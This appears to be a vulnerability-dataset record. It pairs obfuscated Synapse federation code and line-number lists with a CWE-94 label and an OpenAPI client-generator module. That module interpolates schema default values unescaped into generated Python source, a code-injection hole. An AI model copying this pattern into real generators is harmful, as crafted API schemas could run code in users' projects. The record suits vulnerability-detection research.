VAR_147 = VAR_44["token"]
VAR_94 = await VAR_32.get_prev_state_ids()
VAR_148 = VAR_94.get((VAR_188.ThirdPartyInvite, VAR_147))
VAR_149 = None
if VAR_148:
VAR_149 = await self.store.get_event(VAR_148, allow_none=True)
if not VAR_149:
raise AuthError(403, "Could not find invite")
VAR_0.debug("Checking VAR_89 on VAR_1 %r", VAR_1.content)
VAR_150 = None # type: Optional[Exception]
for public_key_object in self.hs.get_auth().get_public_keys(VAR_149):
try:
for server, signature_block in VAR_44["signatures"].items():
for VAR_199, encoded_signature in signature_block.items():
if not VAR_199.startswith("ed25519:"):
continue
VAR_0.debug(
"Attempting to verify sig with VAR_144 %s from %r "
"against pubkey %r",
VAR_199,
server,
public_key_object,
)
try:
VAR_46 = public_key_object["public_key"]
VAR_203 = decode_verify_key_bytes(
VAR_199, decode_base64(VAR_46)
)
verify_signed_json(VAR_44, server, VAR_203)
VAR_0.debug(
"Successfully verified sig with VAR_144 %s from %r "
"against pubkey %r",
VAR_199,
server,
public_key_object,
)
except Exception:
VAR_0.info(
"Failed to verify sig with VAR_144 %s from %r "
"against pubkey %r",
VAR_199,
server,
public_key_object,
)
raise
try:
if "key_validity_url" in public_key_object:
await self._check_key_revocation(
VAR_46, public_key_object["key_validity_url"]
)
except Exception:
VAR_0.info(
"Failed to query key_validity_url %s",
public_key_object["key_validity_url"],
)
raise
return
except Exception as VAR_170:
VAR_150 = VAR_170
if VAR_150 is None:
raise RuntimeError("no public VAR_144 in invite event")
raise VAR_150
async def FUNC_41(self, VAR_46, VAR_47):
try:
VAR_183 = await self.http_client.get_json(VAR_47, {"public_key": VAR_46})
except Exception:
raise SynapseError(502, "Third party certificate could not be checked")
if "valid" not in VAR_183 or not VAR_183["valid"]:
raise AuthError(403, "Third party certificate was invalid")
async def FUNC_42(
self,
VAR_11: str,
VAR_48: Sequence[Tuple[EventBase, EventContext]],
VAR_33: bool = False,
) -> int:
VAR_151 = self.config.worker.events_shard_config.get_instance(VAR_11)
if VAR_151 != self._instance_name:
VAR_184 = await self._send_events(
instance_name=VAR_151,
store=self.store,
VAR_11=room_id,
VAR_48=event_and_contexts,
VAR_33=backfilled,
)
return VAR_184["max_stream_id"]
else:
assert self.storage.persistence
VAR_20, VAR_49 = await self.storage.persistence.persist_events(
VAR_48, VAR_33=backfilled
)
if self._ephemeral_messages_enabled:
for VAR_1 in VAR_20:
self._message_handler.maybe_schedule_expiry(VAR_1)
if not VAR_33: # Never notify for VAR_33 VAR_20
for VAR_1 in VAR_20:
await self._notify_persisted_event(VAR_1, VAR_49)
return VAR_49.stream
async def FUNC_43(
self, VAR_1: EventBase, VAR_49: RoomStreamToken
) -> None:
VAR_152 = []
if VAR_1.type == VAR_188.Member:
VAR_43 = VAR_1.state_key
if VAR_1.internal_metadata.is_outlier():
if VAR_1.membership != Membership.INVITE:
if not self.is_mine_id(VAR_43):
return
VAR_185 = UserID.from_string(VAR_43)
VAR_152.append(VAR_185)
elif VAR_1.internal_metadata.is_outlier():
return
assert VAR_1.internal_metadata.stream_ordering
VAR_153 = PersistedEventPosition(
self._instance_name, VAR_1.internal_metadata.stream_ordering
)
self.notifier.on_new_room_event(
VAR_1, VAR_153, VAR_49, VAR_152=extra_users
)
async def FUNC_44(self, VAR_11: str) -> None:
if self.config.worker_app:
await self._clean_room_for_join_client(VAR_11)
else:
await self.store.clean_room_for_join(VAR_11)
async def FUNC_45(
self, VAR_50: List[str], VAR_11: str
) -> Optional[dict]:
for host in VAR_50:
VAR_168 = await self.federation_client.get_room_complexity(host, VAR_11)
if VAR_168:
return VAR_168
return None
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
19,
25,
30,
32,
88,
91,
93,
94,
98,
101,
103,
106,
110,
111,
122,
125,
127,
146,
151,
164,
165,
166,
169,
171,
173,
177,
185,
188,
190,
191,
195,
196,
197,
198,
206,
207,
208,
209,
217,
218,
219,
229,
230,
231,
232,
233,
234,
235,
245,
247,
248,
250,
252,
254,
257,
259,
260,
261,
262,
267,
268,
283,
293,
294,
295,
297,
304,
306,
307,
308,
309,
310,
311,
312,
313,
314,
315,
316,
317,
318,
319,
320,
321,
322,
323,
324,
325,
326,
327,
328,
329,
347,
353,
354,
355,
358,
360,
361,
363,
364,
366,
367,
368,
373,
375,
376,
377,
381,
386,
389,
398,
399,
400,
401,
402,
403,
410,
426,
428,
437,
440,
442,
445,
447,
448,
449,
452,
460,
461,
462,
463,
464,
465,
466,
467,
468,
469,
470,
471,
472,
473,
474,
475,
476,
477,
478,
479,
480,
481,
482,
483,
484,
485,
486,
487,
488,
489,
490,
491,
492,
493,
494,
495,
496,
497,
498,
499,
500,
501,
502,
503,
504,
505,
506,
507,
508,
520,
521,
522,
527,
535,
536,
537,
539,
560,
569,
576,
587,
589,
592,
596,
604,
608,
615,
618,
620,
625,
627,
631,
636,
641,
643,
650,
654,
655,
656,
660,
661,
662,
663,
664,
665,
671,
673,
674,
675,
684,
686,
688,
694,
697,
699,
706,
708,
713,
714,
715,
719,
721,
723,
734,
735,
737,
738,
739,
740,
741,
743,
746,
751,
755,
756,
759,
762,
763,
769,
770,
771,
780,
785,
790,
793,
794,
801,
805,
808,
812,
819,
823,
826,
827,
828,
829,
830,
831,
832,
833,
834,
835,
836,
837,
841,
843,
846,
848,
850,
851,
852,
853,
855,
857,
858,
859,
874,
885,
887,
888,
889,
891,
892,
895,
910,
913,
914,
916,
920,
921,
922,
924,
925,
926,
927,
929,
931,
937,
948,
952,
953,
954,
955,
956,
957,
958,
959,
960,
961,
962,
963,
964,
965,
966,
967,
968,
969,
970,
971,
972,
973,
974,
975,
976,
977,
978,
980,
986,
987,
988,
996,
999,
1000,
1003,
1004,
1005,
1006,
1007,
1008,
1009,
1010,
1011,
1012,
1021,
1029,
1030,
1031,
1032,
1033,
1034,
1035,
1036,
1040,
1041,
1042,
1043,
1044,
1047,
1048,
1049,
1051,
1052,
1053,
1054,
1055,
1056,
1058,
1061,
1065,
1075,
1087,
1089,
1091,
1095,
1097,
1103,
1104,
1105,
1113,
1119,
1134,
1136,
1140,
1141,
1142,
1143,
1146,
1148,
1156,
1157,
1158,
1160,
1173,
1176,
1182,
1184,
1186,
1191,
1195,
1198,
1200,
1202,
1214,
1216,
1224,
1226,
1227,
1228,
1229,
1230,
1240,
1250,
1252,
1256,
1260,
1264,
1267,
1269,
1280,
1288,
1291,
1300,
1302,
1309,
1315,
1320,
1323,
1326,
1328,
1330,
1333,
1334,
1336,
1338,
1347,
1348,
1349,
1350,
1352,
1354,
1356,
1358,
1360,
1361,
1368,
1372,
1377,
1381,
1384,
1386,
1387,
1388,
1389,
1390,
1391,
1392,
1393,
1394,
1395,
1399,
1403,
1404,
1405,
1411,
1412,
1413,
1421,
1422,
1427,
1433,
1434,
1435,
1436,
1437,
1438,
1439,
1441,
1444,
1463,
1470,
1483,
1484,
1485,
1487,
1488,
1495,
1497,
1508,
1516,
1517,
1518,
1522,
1524,
1530,
1537,
1545,
1547,
1548,
1549,
1550,
1551,
1552,
1553,
1554,
1555,
1556,
1557,
1558,
1559,
1561,
1563,
1569,
1571,
1574,
1576,
1578,
1583,
1588,
1592,
1595,
1602,
1606,
1612,
1615,
1616,
1619,
1620,
1621,
1622,
1626,
1629,
1638,
1641,
1643,
1650,
1651,
1654,
1655,
1656,
1663,
1665,
1670,
1672,
1689,
1691,
1692,
1693,
1699,
1706,
1719,
1731,
1735,
1737,
1738,
1745,
1747,
1751,
1757,
1765,
1767,
1769,
1775,
1777,
1781,
1783,
1785,
1789,
1791,
1799,
1804,
1809,
1811,
1815,
1817,
1824,
1828,
1836,
1837,
1839,
1841,
1843,
1845,
1851,
1856,
1859,
1866,
1871,
1877,
1880,
1887,
1897,
1906,
1908,
1920,
1923,
1935,
1942,
1951,
1965,
1967,
1982,
1986,
1992,
1994,
1995,
1997,
2001,
2004,
2010,
2019,
2028,
2032,
2033,
2034,
2035,
2036,
2037,
2039,
2043,
2051,
2055,
2059,
2069,
2077,
2078,
2079,
2087,
2089,
2092,
2095,
2097,
2103,
2109,
2110,
2111,
2114,
2118,
2120,
2121,
2123,
2126,
2127,
2129,
2130,
2131,
2132,
2133,
2134,
2135,
2136,
2137,
2138,
2139,
2140,
2156,
2160,
2161,
2166,
2171,
2177,
2184,
2186,
2187,
2188,
2194,
2195,
2199,
2200,
2201,
2202,
2204,
2206,
2208,
2215,
2216,
2218,
2225,
2229,
2231,
2240,
2247,
2252,
2259,
2265,
2266,
2267,
2268,
2274,
2280,
2282,
2291,
2296,
2300,
2305,
2308,
2313,
2315,
2320,
2321,
2322,
2326,
2327,
2328,
2329,
2334,
2336,
2344,
2345,
2348,
2352,
2356,
2359,
2368,
2373,
2378,
2381,
2383,
2384,
2385,
2386,
2387,
2390,
2394,
2397,
2403,
2404,
2405,
2407,
2415,
2416,
2417,
2418,
2419,
2420,
2421,
2423,
2424,
2425,
2426,
2431,
2436,
2445,
2447,
2451,
2453,
2459,
2462,
2464,
2466,
2470,
2478,
2481,
2483,
2486,
2488,
2489,
2498,
2507,
2513,
2517,
2521,
2523,
2524,
2525,
2526,
2529,
2531,
2532,
2533,
2534,
2535,
2536,
2537,
2540,
2543,
2546,
2548,
2554,
2557,
2559,
2567,
2572,
2577,
2582,
2587,
2588,
2592,
2597,
2599,
2600,
2601,
2602,
2603,
2604,
2605,
2615,
2617,
2621,
2622,
2624,
2626,
2628,
2637,
2643,
2654,
2658,
2663,
2667,
2669,
2670,
2671,
2673,
2679,
2681,
2682,
2690,
2695,
2698,
2701,
2705,
2706,
2707,
2709,
2716,
2723,
2724,
2725,
2727,
2728,
2731,
2747,
2748,
2749,
2750,
2751,
2758,
2759,
2760,
2761,
2769,
2773,
2777,
2786,
2789,
2793,
2796,
2798,
2800,
2801,
2804,
2809,
2817,
2854,
2856,
2857,
2859,
2861,
2865,
2869,
2881,
2890,
2911,
2912,
2913,
2917,
2920,
2922,
2926,
2928,
2934,
2939,
2943,
2944,
2945,
2950,
2955,
2956,
2958,
2965,
2969,
2977,
2983,
2987,
2992,
2995,
2996,
2999,
3000,
3001,
3003,
18,
97,
98,
99,
100,
101,
102,
103,
104,
105,
113,
114,
115,
116,
117,
118,
119,
120,
121,
175,
176,
177,
178,
179,
180,
181,
182,
183,
184,
430,
431,
432,
433,
434,
435,
436,
568,
569,
570,
571,
572,
573,
574,
575,
576,
577,
578,
579,
580,
624,
625,
626,
627,
628,
629,
630,
631,
632,
633,
634,
635,
636,
637,
638,
639,
692,
693,
694,
695,
696,
697,
698,
699,
700,
701,
702,
703,
787,
788,
789,
804,
805,
806,
807,
808,
809,
810,
811,
812,
813,
814,
815,
816,
935,
936,
937,
938,
939,
940,
941,
942,
943,
944,
945,
946,
1190,
1191,
1192,
1193,
1194,
1195,
1196,
1197,
1258,
1259,
1260,
1261,
1262,
1263,
1264,
1265,
1266,
1267,
1268,
1269,
1270,
1271,
1272,
1290,
1291,
1292,
1293,
1313,
1314,
1315,
1316,
1317,
1318,
1319,
1320,
1321,
1322,
1323,
1324,
1325,
1326,
1327,
1328,
1329,
1330,
1331,
1332,
1443,
1444,
1445,
1446,
1447,
1448,
1467,
1468,
1469,
1470,
1471,
1472,
1473,
1474,
1475,
1526,
1527,
1528,
1582,
1583,
1584,
1585,
1703,
1704,
1705,
1706,
1707,
1708,
1709,
1710,
1711,
1749,
1779,
1780,
1806,
1807,
1850,
1851,
1852,
1853,
1854,
1855,
1856,
1857,
1858,
1859,
1860,
1861,
1862,
1916,
1917,
1918,
1919,
1920,
1921,
1922,
1961,
1962,
1963,
1964,
1965,
1966,
1967,
1968,
1969,
1970,
1971,
1972,
1973,
1974,
1975,
1976,
2101,
2102,
2103,
2104,
2105,
2106,
2107,
2108,
2239,
2240,
2241,
2242,
2243,
2244,
2245,
2246,
2247,
2248,
2249,
2250,
2251,
2252,
2253,
2254,
2255,
2256,
2290,
2291,
2292,
2293,
2294,
2295,
2296,
2297,
2298,
2299,
2300,
2301,
2302,
2303,
2304,
2305,
2306,
2307,
2308,
2309,
2310,
2311,
2312,
2313,
2314,
2315,
2316,
2317,
2318,
2457,
2458,
2459,
2460,
2461,
2462,
2463,
2464,
2465,
2466,
2467,
2468,
2469,
2511,
2512,
2513,
2514,
2515,
2516,
2517,
2518,
2519,
2520,
2694,
2695,
2696,
2697,
2698,
2699,
2700,
2701,
2702,
2771,
2772,
2773,
2774,
2775,
2776,
2777,
2778,
2779,
2780,
2781,
2782,
2783,
2863,
2864,
2865,
2866,
2867,
2868,
2869,
2870,
2871,
2872,
2873,
2874,
2888,
2889,
2890,
2891,
2892,
2893,
2894,
2895,
2896,
2897,
2898,
2932,
2933,
2934,
2935,
2936,
2937,
2938,
2967,
2968,
2969,
2970,
2971,
2972,
2981,
2982,
2983,
2984,
2985,
2986,
2987,
2988,
2989,
2990,
2991,
1060,
1061,
1062,
1063,
1064,
1065,
1066,
1067,
1068,
1069
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
19,
25,
30,
32,
88,
91,
93,
94,
98,
101,
103,
106,
110,
111,
122,
125,
127,
146,
151,
164,
165,
166,
169,
171,
173,
177,
185,
188,
190,
191,
195,
196,
197,
198,
206,
207,
208,
209,
217,
218,
219,
229,
230,
231,
232,
233,
234,
235,
245,
247,
248,
250,
252,
254,
257,
259,
260,
261,
262,
267,
268,
283,
293,
294,
295,
297,
304,
306,
307,
308,
309,
310,
311,
312,
313,
314,
315,
316,
317,
318,
319,
320,
321,
322,
323,
324,
325,
326,
327,
328,
329,
347,
353,
354,
355,
358,
360,
361,
363,
364,
366,
367,
368,
373,
375,
376,
377,
381,
386,
389,
398,
399,
400,
401,
402,
403,
410,
426,
428,
437,
440,
442,
445,
447,
448,
449,
452,
460,
461,
462,
463,
464,
465,
466,
467,
468,
469,
470,
471,
472,
473,
474,
475,
476,
477,
478,
479,
480,
481,
482,
483,
484,
485,
486,
487,
488,
489,
490,
491,
492,
493,
494,
495,
496,
497,
498,
499,
500,
501,
502,
503,
504,
505,
506,
507,
508,
520,
521,
522,
527,
535,
536,
537,
539,
560,
569,
576,
587,
589,
592,
596,
604,
608,
615,
618,
620,
625,
627,
631,
636,
641,
643,
650,
654,
655,
656,
660,
661,
662,
663,
664,
665,
671,
673,
674,
675,
684,
686,
688,
694,
697,
699,
706,
708,
713,
714,
715,
719,
721,
723,
734,
735,
737,
738,
739,
740,
741,
743,
746,
751,
755,
756,
759,
762,
763,
769,
770,
771,
780,
785,
790,
793,
794,
801,
805,
808,
812,
819,
823,
826,
827,
828,
829,
830,
831,
832,
833,
834,
835,
836,
837,
841,
843,
846,
848,
850,
851,
852,
853,
855,
857,
858,
859,
874,
885,
887,
888,
889,
891,
892,
895,
910,
913,
914,
916,
920,
921,
922,
924,
925,
926,
927,
929,
931,
937,
948,
952,
953,
954,
955,
956,
957,
958,
959,
960,
961,
962,
963,
964,
965,
966,
967,
968,
969,
970,
971,
972,
973,
974,
975,
976,
977,
978,
980,
986,
987,
988,
996,
999,
1000,
1003,
1004,
1005,
1006,
1007,
1008,
1009,
1010,
1011,
1012,
1021,
1029,
1030,
1031,
1032,
1033,
1034,
1035,
1036,
1040,
1041,
1042,
1043,
1044,
1047,
1048,
1049,
1051,
1052,
1053,
1054,
1055,
1056,
1058,
1061,
1065,
1075,
1087,
1089,
1091,
1095,
1097,
1103,
1104,
1105,
1113,
1119,
1134,
1136,
1140,
1141,
1142,
1143,
1146,
1148,
1156,
1157,
1158,
1160,
1173,
1176,
1182,
1184,
1186,
1191,
1195,
1198,
1200,
1202,
1214,
1216,
1224,
1226,
1227,
1228,
1229,
1230,
1240,
1250,
1252,
1256,
1260,
1264,
1267,
1269,
1280,
1288,
1291,
1300,
1302,
1309,
1315,
1320,
1323,
1326,
1328,
1330,
1333,
1334,
1336,
1338,
1347,
1348,
1349,
1350,
1352,
1354,
1356,
1358,
1360,
1361,
1368,
1372,
1377,
1381,
1384,
1386,
1387,
1388,
1389,
1390,
1391,
1392,
1393,
1394,
1395,
1399,
1403,
1404,
1405,
1411,
1412,
1413,
1421,
1422,
1427,
1433,
1434,
1435,
1436,
1437,
1438,
1439,
1441,
1444,
1463,
1470,
1483,
1484,
1485,
1487,
1488,
1495,
1497,
1508,
1516,
1517,
1518,
1522,
1524,
1530,
1537,
1545,
1547,
1548,
1549,
1550,
1551,
1552,
1553,
1554,
1555,
1556,
1557,
1558,
1559,
1561,
1563,
1569,
1571,
1574,
1576,
1578,
1583,
1588,
1592,
1595,
1602,
1606,
1612,
1615,
1616,
1619,
1620,
1621,
1622,
1626,
1629,
1638,
1641,
1643,
1650,
1651,
1654,
1655,
1656,
1663,
1665,
1670,
1672,
1689,
1691,
1692,
1693,
1699,
1706,
1719,
1731,
1735,
1737,
1738,
1745,
1747,
1751,
1757,
1765,
1767,
1769,
1775,
1777,
1781,
1783,
1785,
1789,
1791,
1799,
1804,
1809,
1811,
1815,
1817,
1824,
1828,
1836,
1837,
1839,
1841,
1843,
1845,
1851,
1856,
1859,
1866,
1871,
1877,
1880,
1887,
1897,
1906,
1908,
1920,
1923,
1935,
1942,
1951,
1965,
1967,
1982,
1986,
1992,
1994,
1995,
1997,
2001,
2004,
2010,
2019,
2028,
2032,
2033,
2034,
2035,
2036,
2037,
2039,
2043,
2051,
2055,
2059,
2069,
2077,
2078,
2079,
2087,
2089,
2092,
2095,
2097,
2103,
2109,
2110,
2111,
2114,
2118,
2120,
2121,
2123,
2126,
2127,
2129,
2130,
2131,
2132,
2133,
2134,
2135,
2136,
2137,
2138,
2139,
2140,
2156,
2160,
2161,
2166,
2171,
2177,
2184,
2186,
2187,
2188,
2194,
2195,
2199,
2200,
2201,
2202,
2204,
2206,
2208,
2215,
2216,
2218,
2225,
2229,
2231,
2240,
2247,
2252,
2259,
2265,
2266,
2267,
2268,
2274,
2280,
2282,
2291,
2296,
2300,
2305,
2308,
2313,
2315,
2320,
2321,
2322,
2326,
2327,
2328,
2329,
2334,
2336,
2344,
2345,
2348,
2352,
2356,
2359,
2368,
2373,
2378,
2381,
2383,
2384,
2385,
2386,
2387,
2390,
2394,
2397,
2403,
2404,
2405,
2407,
2415,
2416,
2417,
2418,
2419,
2420,
2421,
2423,
2424,
2425,
2426,
2431,
2436,
2445,
2447,
2451,
2453,
2459,
2462,
2464,
2466,
2470,
2478,
2481,
2483,
2486,
2488,
2489,
2498,
2507,
2513,
2517,
2521,
2523,
2524,
2525,
2526,
2529,
2531,
2532,
2533,
2534,
2535,
2536,
2537,
2540,
2543,
2546,
2548,
2554,
2557,
2559,
2567,
2572,
2577,
2582,
2587,
2588,
2592,
2597,
2599,
2600,
2601,
2602,
2603,
2604,
2605,
2615,
2617,
2621,
2622,
2624,
2626,
2628,
2637,
2643,
2654,
2658,
2663,
2667,
2669,
2670,
2671,
2673,
2679,
2681,
2682,
2690,
2695,
2698,
2701,
2705,
2706,
2707,
2709,
2716,
2723,
2724,
2725,
2727,
2728,
2731,
2747,
2748,
2749,
2750,
2751,
2758,
2759,
2760,
2761,
2769,
2773,
2777,
2786,
2789,
2793,
2796,
2798,
2800,
2801,
2804,
2809,
2817,
2854,
2856,
2857,
2859,
2861,
2865,
2869,
2881,
2890,
2911,
2912,
2913,
2917,
2920,
2922,
2926,
2928,
2934,
2939,
2943,
2944,
2945,
2950,
2955,
2956,
2958,
2965,
2969,
2977,
2983,
2987,
2992,
2995,
2996,
2999,
3000,
3001,
3003,
18,
97,
98,
99,
100,
101,
102,
103,
104,
105,
113,
114,
115,
116,
117,
118,
119,
120,
121,
175,
176,
177,
178,
179,
180,
181,
182,
183,
184,
430,
431,
432,
433,
434,
435,
436,
568,
569,
570,
571,
572,
573,
574,
575,
576,
577,
578,
579,
580,
624,
625,
626,
627,
628,
629,
630,
631,
632,
633,
634,
635,
636,
637,
638,
639,
692,
693,
694,
695,
696,
697,
698,
699,
700,
701,
702,
703,
787,
788,
789,
804,
805,
806,
807,
808,
809,
810,
811,
812,
813,
814,
815,
816,
935,
936,
937,
938,
939,
940,
941,
942,
943,
944,
945,
946,
1190,
1191,
1192,
1193,
1194,
1195,
1196,
1197,
1258,
1259,
1260,
1261,
1262,
1263,
1264,
1265,
1266,
1267,
1268,
1269,
1270,
1271,
1272,
1290,
1291,
1292,
1293,
1313,
1314,
1315,
1316,
1317,
1318,
1319,
1320,
1321,
1322,
1323,
1324,
1325,
1326,
1327,
1328,
1329,
1330,
1331,
1332,
1443,
1444,
1445,
1446,
1447,
1448,
1467,
1468,
1469,
1470,
1471,
1472,
1473,
1474,
1475,
1526,
1527,
1528,
1582,
1583,
1584,
1585,
1703,
1704,
1705,
1706,
1707,
1708,
1709,
1710,
1711,
1749,
1779,
1780,
1806,
1807,
1850,
1851,
1852,
1853,
1854,
1855,
1856,
1857,
1858,
1859,
1860,
1861,
1862,
1916,
1917,
1918,
1919,
1920,
1921,
1922,
1961,
1962,
1963,
1964,
1965,
1966,
1967,
1968,
1969,
1970,
1971,
1972,
1973,
1974,
1975,
1976,
2101,
2102,
2103,
2104,
2105,
2106,
2107,
2108,
2239,
2240,
2241,
2242,
2243,
2244,
2245,
2246,
2247,
2248,
2249,
2250,
2251,
2252,
2253,
2254,
2255,
2256,
2290,
2291,
2292,
2293,
2294,
2295,
2296,
2297,
2298,
2299,
2300,
2301,
2302,
2303,
2304,
2305,
2306,
2307,
2308,
2309,
2310,
2311,
2312,
2313,
2314,
2315,
2316,
2317,
2318,
2457,
2458,
2459,
2460,
2461,
2462,
2463,
2464,
2465,
2466,
2467,
2468,
2469,
2511,
2512,
2513,
2514,
2515,
2516,
2517,
2518,
2519,
2520,
2694,
2695,
2696,
2697,
2698,
2699,
2700,
2701,
2702,
2771,
2772,
2773,
2774,
2775,
2776,
2777,
2778,
2779,
2780,
2781,
2782,
2783,
2863,
2864,
2865,
2866,
2867,
2868,
2869,
2870,
2871,
2872,
2873,
2874,
2888,
2889,
2890,
2891,
2892,
2893,
2894,
2895,
2896,
2897,
2898,
2932,
2933,
2934,
2935,
2936,
2937,
2938,
2967,
2968,
2969,
2970,
2971,
2972,
2981,
2982,
2983,
2984,
2985,
2986,
2987,
2988,
2989,
2990,
2991,
1060,
1061,
1062,
1063,
1064,
1065,
1066,
1067,
1068,
1069
] |
5CWE-94
| from __future__ import annotations
from dataclasses import InitVar, dataclass, field
from typing import Any, ClassVar, Dict, Generic, List, Optional, Set, TypeVar, Union
from .. import schema as oai
from .. import utils
from .errors import PropertyError
from .reference import Reference
@dataclass
class Property:
"""
Describes a single property for a schema
Attributes:
template: Name of the template file (if any) to use for this property. Must be stored in
templates/property_templates and must contain two macros: construct and transform. Construct will be used to
build this property from JSON data (a response from an API). Transform will be used to convert this property
to JSON data (when sending a request to the API).
"""
name: str
required: bool
default: Optional[Any]
template: ClassVar[Optional[str]] = None
_type_string: ClassVar[str]
python_name: str = field(init=False)
def __post_init__(self) -> None:
self.python_name = utils.snake_case(self.name)
def get_type_string(self) -> str:
""" Get a string representation of type that should be used when declaring this property """
if self.required:
return self._type_string
return f"Optional[{self._type_string}]"
def get_imports(self, *, prefix: str) -> Set[str]:
"""
Get a set of import strings that should be included when this property is used somewhere
Args:
prefix: A prefix to put before any relative (local) module names.
"""
if not self.required:
return {"from typing import Optional"}
return set()
def to_string(self) -> str:
""" How this should be declared in a dataclass """
if self.default:
default = self.default
elif not self.required:
default = "None"
else:
default = None
if default is not None:
return f"{self.python_name}: {self.get_type_string()} = {self.default}"
else:
return f"{self.python_name}: {self.get_type_string()}"
@dataclass
class StringProperty(Property):
""" A property of type str """
max_length: Optional[int] = None
pattern: Optional[str] = None
_type_string: ClassVar[str] = "str"
def __post_init__(self) -> None:
super().__post_init__()
if self.default is not None:
self.default = f'"{self.default}"'
@dataclass
class DateTimeProperty(Property):
"""
A property of type datetime.datetime
"""
_type_string: ClassVar[str] = "datetime"
template: ClassVar[str] = "datetime_property.pyi"
def get_imports(self, *, prefix: str) -> Set[str]:
"""
Get a set of import strings that should be included when this property is used somewhere
Args:
prefix: A prefix to put before any relative (local) module names.
"""
imports = super().get_imports(prefix=prefix)
imports.update({"from datetime import datetime", "from typing import cast"})
return imports
@dataclass
class DateProperty(Property):
""" A property of type datetime.date """
_type_string: ClassVar[str] = "date"
template: ClassVar[str] = "date_property.pyi"
def get_imports(self, *, prefix: str) -> Set[str]:
"""
Get a set of import strings that should be included when this property is used somewhere
Args:
prefix: A prefix to put before any relative (local) module names.
"""
imports = super().get_imports(prefix=prefix)
imports.update({"from datetime import date", "from typing import cast"})
return imports
@dataclass
class FileProperty(Property):
""" A property used for uploading files """
_type_string: ClassVar[str] = "File"
template: ClassVar[str] = "file_property.pyi"
def get_imports(self, *, prefix: str) -> Set[str]:
"""
Get a set of import strings that should be included when this property is used somewhere
Args:
prefix: A prefix to put before any relative (local) module names.
"""
imports = super().get_imports(prefix=prefix)
imports.update({f"from {prefix}.types import File", "from dataclasses import astuple"})
return imports
@dataclass
class FloatProperty(Property):
""" A property of type float """
default: Optional[float] = None
_type_string: ClassVar[str] = "float"
@dataclass
class IntProperty(Property):
""" A property of type int """
default: Optional[int] = None
_type_string: ClassVar[str] = "int"
@dataclass
class BooleanProperty(Property):
""" Property for bool """
_type_string: ClassVar[str] = "bool"
InnerProp = TypeVar("InnerProp", bound=Property)
@dataclass
class ListProperty(Property, Generic[InnerProp]):
""" A property representing a list (array) of other properties """
inner_property: InnerProp
template: ClassVar[str] = "list_property.pyi"
def __post_init__(self) -> None:
super().__post_init__()
if self.default is not None:
self.default = f"field(default_factory=lambda: cast({self.get_type_string()}, {self.default}))"
def get_type_string(self) -> str:
""" Get a string representation of type that should be used when declaring this property """
if self.required:
return f"List[{self.inner_property.get_type_string()}]"
return f"Optional[List[{self.inner_property.get_type_string()}]]"
def get_imports(self, *, prefix: str) -> Set[str]:
"""
Get a set of import strings that should be included when this property is used somewhere
Args:
prefix: A prefix to put before any relative (local) module names.
"""
imports = super().get_imports(prefix=prefix)
imports.update(self.inner_property.get_imports(prefix=prefix))
imports.add("from typing import List")
if self.default is not None:
imports.add("from dataclasses import field")
imports.add("from typing import cast")
return imports
@dataclass
class UnionProperty(Property):
""" A property representing a Union (anyOf) of other properties """
inner_properties: List[Property]
template: ClassVar[str] = "union_property.pyi"
def get_type_string(self) -> str:
""" Get a string representation of type that should be used when declaring this property """
inner_types = [p.get_type_string() for p in self.inner_properties]
inner_prop_string = ", ".join(inner_types)
if self.required:
return f"Union[{inner_prop_string}]"
return f"Optional[Union[{inner_prop_string}]]"
def get_imports(self, *, prefix: str) -> Set[str]:
"""
Get a set of import strings that should be included when this property is used somewhere
Args:
prefix: A prefix to put before any relative (local) module names.
"""
imports = super().get_imports(prefix=prefix)
for inner_prop in self.inner_properties:
imports.update(inner_prop.get_imports(prefix=prefix))
imports.add("from typing import Union")
return imports
_existing_enums: Dict[str, EnumProperty] = {}
@dataclass
class EnumProperty(Property):
""" A property that should use an enum """
values: Dict[str, str]
reference: Reference = field(init=False)
title: InitVar[str]
template: ClassVar[str] = "enum_property.pyi"
def __post_init__(self, title: str) -> None: # type: ignore
super().__post_init__()
reference = Reference.from_ref(title)
dedup_counter = 0
while reference.class_name in _existing_enums:
existing = _existing_enums[reference.class_name]
if self.values == existing.values:
break # This is the same Enum, we're good
dedup_counter += 1
reference = Reference.from_ref(f"{reference.class_name}{dedup_counter}")
self.reference = reference
inverse_values = {v: k for k, v in self.values.items()}
if self.default is not None:
self.default = f"{self.reference.class_name}.{inverse_values[self.default]}"
_existing_enums[self.reference.class_name] = self
@staticmethod
def get_all_enums() -> Dict[str, EnumProperty]:
""" Get all the EnumProperties that have been registered keyed by class name """
return _existing_enums
@staticmethod
def get_enum(name: str) -> Optional[EnumProperty]:
""" Get all the EnumProperties that have been registered keyed by class name """
return _existing_enums.get(name)
def get_type_string(self) -> str:
""" Get a string representation of type that should be used when declaring this property """
if self.required:
return self.reference.class_name
return f"Optional[{self.reference.class_name}]"
def get_imports(self, *, prefix: str) -> Set[str]:
"""
Get a set of import strings that should be included when this property is used somewhere
Args:
prefix: A prefix to put before any relative (local) module names.
"""
imports = super().get_imports(prefix=prefix)
imports.add(f"from {prefix}.{self.reference.module_name} import {self.reference.class_name}")
return imports
@staticmethod
def values_from_list(values: List[str]) -> Dict[str, str]:
""" Convert a list of values into dict of {name: value} """
output: Dict[str, str] = {}
for i, value in enumerate(values):
if value[0].isalpha():
key = value.upper()
else:
key = f"VALUE_{i}"
if key in output:
raise ValueError(f"Duplicate key {key} in Enum")
output[key] = value
return output
@dataclass
class RefProperty(Property):
""" A property which refers to another Schema """
reference: Reference
@property
def template(self) -> str: # type: ignore
enum = EnumProperty.get_enum(self.reference.class_name)
if enum:
return "enum_property.pyi"
return "ref_property.pyi"
def get_type_string(self) -> str:
""" Get a string representation of type that should be used when declaring this property """
if self.required:
return self.reference.class_name
return f"Optional[{self.reference.class_name}]"
def get_imports(self, *, prefix: str) -> Set[str]:
"""
Get a set of import strings that should be included when this property is used somewhere
Args:
prefix: A prefix to put before any relative (local) module names.
"""
imports = super().get_imports(prefix=prefix)
imports.update(
{
f"from {prefix}.{self.reference.module_name} import {self.reference.class_name}",
"from typing import Dict",
"from typing import cast",
}
)
return imports
@dataclass
class DictProperty(Property):
""" Property that is a general Dict """
_type_string: ClassVar[str] = "Dict[Any, Any]"
def __post_init__(self) -> None:
super().__post_init__()
if self.default is not None:
self.default = f"field(default_factory=lambda: cast({self.get_type_string()}, {self.default}))"
def get_imports(self, *, prefix: str) -> Set[str]:
"""
Get a set of import strings that should be included when this property is used somewhere
Args:
prefix: A prefix to put before any relative (local) module names.
"""
